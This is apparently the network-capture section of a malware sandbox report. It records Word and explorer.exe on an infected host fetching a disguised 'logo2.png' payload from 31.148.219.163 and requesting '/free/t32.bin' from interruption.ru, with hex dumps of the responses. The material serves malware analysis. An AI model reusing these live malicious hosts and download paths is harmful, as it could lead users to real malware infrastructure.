                    Mr 20, 2019 16:37:49.987011909 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987045050 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987066031 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987087011 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987107038 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987127066 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987148046 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987169027 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987189054 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987209082 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987229109 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987248898 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987267971 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987288952 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987308979 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987330914 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987350941 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987371922 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987391949 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987427950 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987451077 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987478018 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987498999 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987520933 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987564087 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987586021 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987643003 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987669945 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987692118 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987714052 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987734079 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987755060 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987776041 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987797022 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987838030 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987879038 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987900019 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987921000 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987966061 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987987995 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988009930 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988055944 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988079071 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988147020 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988183975 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988208055 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988229990 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988272905 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988296032 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988322973 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988343000 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988373041 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988403082 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988466024 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988487959 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988511086 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988533020 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988574982 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988615990 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988636971 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988682985 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988740921 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988789082 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988810062 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988831043 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988853931 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988874912 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988897085 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988955975 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988977909 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989016056 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989037991 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989092112 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989114046 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989151955 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989172935 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989218950 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989252090 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989273071 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989310026 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989350080 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989388943 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989424944 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989464045 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989497900 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989517927 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989557981 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989593029 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989614964 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989634991 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989655972 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989659071 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.989676952 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989810944 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.990050077 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.990155935 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.990561962 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.990617037 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.990792036 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990823030 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990844965 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990870953 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990883112 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990905046 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990935087 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990943909 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990966082 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990987062 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990986109 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.991008043 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991029978 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991050959 MEZ804920431.148.219.163192.168.1.83

                    UDP Packets


                    DNS Queries


                    DNS Answers


                    HTTP Request Dependency Graph

                    • 31.148.219.163
                    • interruption.ru
                    • profitsproject.ru

                    HTTP Packets

                    Session ID: 0
                    Source IP: 192.168.1.83, Source Port: 49204
                    Destination IP: 31.148.219.163, Destination Port: 80
                    Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                    Mr 20, 2019 16:37:49.667716980 MEZ, 0 kBytes transferred, direction OUT:
                    GET /images/logo2.png HTTP/1.1
                    Accept: */*
                    Accept-Language: en-us
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 31.148.219.163
                    Connection: Keep-Alive

                    Mr 20, 2019 16:37:49.700239897 MEZ, 1 kBytes transferred, direction IN:
                    HTTP/1.1 200 OK
                    Date: Wed, 20 Mar 2019 15:37:47 GMT
                    Server: Apache/2.4.6 (CentOS)
                    Last-Modified: Mon, 18 Mar 2019 19:04:42 GMT
                    ETag: "bf548-584630f9b0680"
                    Accept-Ranges: bytes
                    Content-Length: 783688
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: image/png
                    Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 00 00 00 02 ce 08 06 00 00 00 37 2f 61 7d 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 20 00 49 44 41 54 78 9c ec dd 79 74 54 65 9e ff f1 77 55 12 92 40 48 58 13 76 10 08 3b 41 09 84 7d df 91 4d 04 dc 10 d1 9f 6b db 8d da ce 0c 76 b7 33 e0 74 8f 4d f7 8c 8e d0 6e e0 82 1a 05 05 01 21 84 b0 ef 81 b0 07 81 b0 05 08 09 7b d8 93 40 42 96 fa fd 51 e2 d8 2a a4 aa 72 6f dd 4a f2 79 9d 73 0f 1e ce 7d 9e ef 07 9a 56 ea 5b cf 62 03 92 81 76 88 88 88 88 88 94 4d 37 81 dc 9f fd 5c 01 90 05 14 02 d7 81 3c e0 06 90 03 dc 02 ae fd f0 73 57 7f e5 b9 f2 93 7f be 0c 38 4c ff 15 88 88 18 c0 df ea 00 22 22 22 22 22 26 0b fe e1 f9 b9 9a 06 cc 5d 08 64 02 17 80 b3 3f fc 98 09 9c f9 c9 8f a7 80 93 38 1b 11 22 22 96 b1 a1 15 00 22 22 22 22 22 de 70 09 67 33 20 fd 87 e7 76 63 20 15 38 86 73 35 81 88 88 69 b4 02 40 44 44 44 44 c4 3b aa ff f0 dc e9 cb b7 cb 38 9b 01 b7 1b 02 47 7f 78 0e e2 dc 92 20 22 52 22 5a 01 20 22 22 22 22 e2 fb ae 00 29 c0 81 9f fc f8 3d ce 2d 07 22 22 2e 51 03 40 44 44 44 44 a4 f4 3a 05 ec f9 d9 73 d2 d2 44 22 e2 b3 d4 00 10 11 11 11 11 29 5b 2e 03 bb 71 36 03 76 03 db 80 13 96 26 12 11 9f a0 06 80 88 88 88 88 48 d9 77 0d d8 01 24 02 bb 80 cd 38 b7 15 88 48 39 a2 06 80 88 88 88 88 48 f9 53 88 f3 2c 81 2d c0 26 60 3d 70 da ca 40 22 62 3e 35 00 44 44 44 44 44 04 e0 2c ce 95 01 ab 71 ae 14 38 60 6d 1c 11 31 9a cb 0d 80 80 80 00 42 42 42 cc 4f 24 22 22 22 22 62 90 ec ec 6c f2 f3 f3 ad 8e 51 5a a5 03 eb 80 55 38 9b 02 e7 ad 8d 23 22 25 e5 72 03 60 e8 d0 a1 c4 c7 c7 9b 9f 48 44 44 44 44 c4 44 85 85 85 5c bf 7e 1d 80 9c 9c 1c 6e dd ba c5 d5 ab 57 29 28 28 e0 fa f5 eb e4 e6 e6 72 f3 e6 4d ae 5f bf ce d5 ab 57 7f f5 b9 72 e5 0a 97 2e 5d 22 33 33 93 c2 c2 42 8b 7f 45 5e 73 1c 67 23 60 35 b0 1c c8 b2 36 8e 88 b8 cb df ea 00 22 22 22 22 22 de e4 e7 e7 47 d5 aa 55 01 7e fc d1 53 0e 87 83 cc cc 4c 2e 5c b8 c0 85 0b 17 38 7b f6 2c 99 99 99 9c 3f 7f 9e 33 67 ce 90 9e 9e ce a9 53 a7 
c8 c8 c8 20 2f 2f cf 88 f8 56 6a 0c 3c fb c3 73 13 e7 76 81 04 20 0e 48 b5 30 97 88 b8 48 0d 00 11 11 11 11 11 0f d9 6c 36 c2 c3 c3 09 0f 0f 2f f6 dd f3 e7 cf 93 91 91 c1 a9 53 a7 48 4f 4f e7 c4 89 13 a4 a6 a6 92 9a 9a ca 89 13 27 4a 5b 83 20 18 18 f0 c3 f3 36 ce d5 01 4b 71 36 03 36 02 b7 ac 8b 26 22 77 a2 2d 00 22 22 22 22 22 16 2b 2a 2a 22 23 23 e3 c7 86 c0 b1 63 c7 38 78 f0 20 29 29 29 a4 a5 a5 51 54 54 64 75 44 77 5c c1 b9 45 20 0e 88 07 ae 5b 1b 47 44 6e 53 03 40 44 44 44 44 c4 87 dd b8 71 e3 c7 66 c0 ed e7 c0 81 03 1c 3f 7e 1c 87 c3 61 75 bc e2 14 02 49 c0 7c e0 6b 74 90 a0 88 a5 d4 00 10 11 11 11 11 29 85 b2 b2 b2 f8 fe fb ef 39 70 e0 00 29 29 29 ec da b5 8b 1d 3b 76 f8 f2 56 82 9f 36 03 e6 e1 bc 76 50 44 bc 48 0d 00 11 11 11 11 91 32 22 37 37 97 7d fb f6
                    Data Ascii: PNGIHDR7/a}bKGD IDATxytTewU@HXv;A}Mkv3tMn!{@BQ*roJys}V[bvM7\<sW8L"""""&]d?8"""""""pg3 vc 8s5i@DDDD;8Gx "R"Z """")=-"".Q@DDDD:sD")[.q6v&Hw$8H9HS,-&`=p@"b>5DDDDD,q8`m1BBBO$""""blQZU8#"%r`HDDDDD\~nW)((rM_Wr.]"33BE^sg#`56"""""GU~SL.\8{,?3gS //Vj<sv H0Hl6/SHOO'J[ 6Kq66&"w-"""""+**"##c8x )))QTTduDw\E [GDnS@DDDDqf?~auI|kt)9p)));vV6vPDH2"77}
                    Mr 20, 2019 16:37:49.700280905 MEZ3INData Raw: b1 6b d7 2e b6 6d db c6 b6 6d db 38 74 e8 90 2f ae 14 28 c4 79 56 c0 1c 60 01 ce 6d 03 22 62 32 35 00 44 44 44 44 44 ca b0 db 2b 05 36 6f de 4c 62 62 22 49 49 49 64 66 66 5a 1d eb a7 f2 80 55 38 57 06 2c 00 72 ac 8d 23 52 76 a9 01 20 22 22 22 22
                    Data Ascii: k.mm8t/(yV`m"b25DDDDD+6oLbb"IIIdffZU8W,r#Rv """"R?~D6o+IKK:mE8WR@DH9a6lVG8G-"R& """""^f\mqRKoUXz5IIIX'Y[!RZ
                    Mr 20, 2019 16:37:49.700310946 MEZ4INData Raw: 67 f2 ee bb ef 72 f1 e2 45 b3 ca 5c 06 fe 0e cc 00 6e 9a 55 44 c4 0c 36 60 29 70 7f 71 2f de 7b ef bd ec d9 b3 c7 fc 44 3f b8 7c f9 32 d5 ab eb 26 0e 11 11 11 11 91 3b 69 d0 a0 01 f7 dd 77 1f 1d 3a 74 a0 73 e7 ce c4 c4 c4 10 1a 1a 6a 75 2c cb dd
                    Data Ascii: grE\nUD6`)pq/{D?|2&;iw:tsju,qXO*soC<U9rD?DDDDD`i%:ustVZgu4K8_-[*s#YDbc{v9/Pk5EDDDD0wN^
                    Mr 20, 2019 16:37:49.700342894 MEZ5INData Raw: e4 c9 93 59 b8 70 a1 91 d3 26 03 4f 01 7b 8c 9c 54 ca b7 db 77 5a 9c 74 e5 65 6f af 00 00 9d 03 20 22 22 22 22 52 56 9d 3f 7f 9e b7 de 7a 8b d6 ad 5b d3 a1 43 07 66 cd 9a c5 cd 9b 37 ad 8e e5 b6 a6 4d 9b b2 60 c1 02 d6 ad 5b 47 9b 36 6d 8c 9a f6
                    Data Ascii: Yp&O{TwZteo """"RV?z[Cf7M`[G6m^`tev 333uQ@DDDDk=u^VGr[{7oFLLye`JVt^5)?\3'!!T]'{?K/n/~P8"
                    Mr 20, 2019 16:37:49.700371027 MEZ6INData Raw: c5 73 cf 3d 47 66 66 a6 d5 71 7e a1 4a 95 2a c4 c6 c6 f2 f9 e7 9f 13 12 12 52 92 a9 fc 71 9e 09 f0 2d 10 6a 48 38 29 35 7e de 00 d8 e9 ea 40 6f 37 00 02 02 02 b8 ef be fb bc 5a 53 44 44 44 44 44 ca 8f fc fc 7c 66 cd 9a 45 cb 96 2d 99 3e 7d ba 4f
                    Data Ascii: s=Gffq~J*Rq-jH8)5~@o7ZSDDDDD|fE->}O^8avMtttIZ<?o$miwoKixBdd$IIIL:6#I&Zn+XGs'~y_Gaa0Z3eVXAK
Timestamp:Mar 20, 2019 16:37:49.700398922 MEZ
kBytes transferred:8
Direction:IN
Data Raw: fc 7c 4b b3 54 ae 5c 99 45 8b 16 f1 e2 8b 2f 96 64 9a 17 80 58 20 c0 98 54 62 96 bb 9d 01 00 ce 6b 00 2f e0 5c de 71 57 7e 7e 7e 9c 3e 7d 9a 88 88 08 43 82 b9 6a d4 a8 51 2c 5e bc d8 ab 35 45 44 44 44 44 44 8c d0 a1 43 07 e6 ce 9d 4b d3 a6 4d ad
                    Data Ascii: |KT\E/dX Tbk/\qW~~~>}CjQ,^5EDDDDDCKM?^y4.w<q1;i=_}Q~EXSa#Oc-\>|8Wz]#dee1~x&L@vvYutZ<4
Timestamp:Mar 20, 2019 16:37:49.700427055 MEZ
kBytes transferred:9
Direction:IN
Data Raw: 60 60 a0 87 a5 3c 93 9b 9b 4b e3 c6 8d 39 7b f6 ac 57 eb 8a 88 88 88 88 88 58 25 24 24 84 39 73 e6 30 7c f8 70 4b ea 6f da b4 89 21 43 86 90 93 93 e3 c9 f0 75 38 57 9c e7 1a 9b 4a 6e 73 f7 0c 80 db ce 00 2e 1d b7 9f 93 93 43 f3 e6 cd 89 8a 8a f2
                    Data Ascii: ``<K9{WX%$$9s0|pKo!Cu8WJns.Cgg5^+"""""b[n1o<"""7l={2o<Onh|N<nd}q3gO{Xsm>tHp8Xt)i;vdh,S
Timestamp:Mar 20, 2019 16:37:49.700454950 MEZ
kBytes transferred:10
Direction:IN
Data Raw: 88 88 88 88 88 af b1 db ed 7c f0 c1 07 3c fb ec b3 5e ad bb 73 e7 4e fa f4 e9 43 76 76 b6 bb 43 4f e3 6c 02 9c 31 3e 55 d9 63 e4 19 00 e0 5c 05 70 0d 18 ed ca cb 05 05 05 64 65 65 31 62 c4 08 83 63 b8 a6 4f 9f 3e 7c fd f5 d7 5c b9 72 c5 92 fa 22
                    Data Ascii: |<^sNCvvCOl1>Uc\pdee1bcO>|\r""""""pOZ:u=4 IDAT+Cn\3vXjiBPm!66EDDDDD|ehQQ.ffQzuOl4l1Q\TTDZZ>Q
Timestamp:Mar 20, 2019 16:37:49.700480938 MEZ
kBytes transferred:11
Direction:IN
Data Raw: f6 ec e9 c9 cd 00 0b 80 31 26 44 2a 15 ac 68 00 04 03 fb 81 c6 ae 0e e8 df bf 3f 2b 57 ae b4 6c 2b 00 c0 e5 cb 97 89 89 89 e1 d8 b1 63 96 65 10 11 11 11 11 11 f1 55 01 01 01 24 24 24 d0 af 5f 3f af d4 cb c8 c8 20 3a 3a 9a cc 4c 97 cf 9b bf ed 39
                    Data Ascii: 1&D*h?+Wl+ceU$$$_? ::L9`|nXz5Iq\SZ5-ZDXX9DDDDDD|Q~~>c^W~};Q&DyV4n8p8i-/&00""""""+:o=_?^uwspN/W.
Timestamp:Mar 20, 2019 16:37:49.700542927 MEZ
kBytes transferred:12
Direction:IN
Data Raw: 86 0d 23 22 22 c2 bc 64 2e b2 db ed 0c 1f 3e 9c ec ec 6c 4f ee a1 14 11 11 11 11 11 29 b3 92 92 92 68 dd ba 35 ad 5b b7 36 b5 8e bf bf 3f 9d 3b 77 66 f6 ec d9 14 16 16 ba 3a 2c 10 e7 59 00 b1 e6 25 f3 3e 5f 6e 00 00 6c 00 7a 01 8d 5c 1d 70 eb d6
                    Data Ascii: #""d.>lO)h5[6?;wf:,Y%>_nlz\p-7n+W6-l6B[8"""""">c;jZvaw5y^sRy_i8 vgP6miUT1',XqQDDDDDD|Btt4[lB)((SNn2I]x
Timestamp:Mar 20, 2019 16:37:49.732690096 MEZ
kBytes transferred:14
Direction:IN
Data Raw: 1d 48 35 2d 98 c1 ca 52 03 a0 08 58 04 74 c2 79 4d a0 5b d6 af 5f 4f 7e 7e 3e fd fa f5 33 3c 98 11 ec 76 3b 5d ba 74 61 e2 c4 89 64 66 66 f2 fd f7 df 5b 1d 49 44 44 44 44 44 c4 2b 36 6e dc c8 d3 4f 3f 4d 85 0a 15 4c ab 51 a7 4e 1d 32 32 32 d8 b3
                    Data Ascii: H5-RXtyM[_O~~>3<v;]tadff[IDDDDD+6nO?MLQN222g;:3q~yeP,ui&+CnW$"""""bWrljn'pMW;KeP ?O0Pre#/''S2}tu]v


Session ID:1
Source IP:192.168.1.83
Source Port:49205
Destination IP:178.169.196.83
Destination Port:80
Process:C:\Windows\explorer.exe

Timestamp:Mar 20, 2019 16:38:56.260993958 MEZ
kBytes transferred:808
Direction:OUT
Data:GET /free/t32.bin HTTP/1.1
                    Cache-Control: no-cache
                    Connection: Keep-Alive
                    Pragma: no-cache
                    Host: interruption.ru
Timestamp:Mar 20, 2019 16:38:56.423000097 MEZ
kBytes transferred:809
Direction:IN
Data:HTTP/1.1 404 Not Found
                    Server: nginx/1.10.2
                    Date: Wed, 20 Mar 2019 16:38:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 1573
                    Connection: close
                    Referrer-Policy: no-referrer
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 
3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e
                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.
Timestamp:Mar 20, 2019 16:38:56.423110962 MEZ
kBytes transferred:810
Direction:IN
Data Raw: 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63
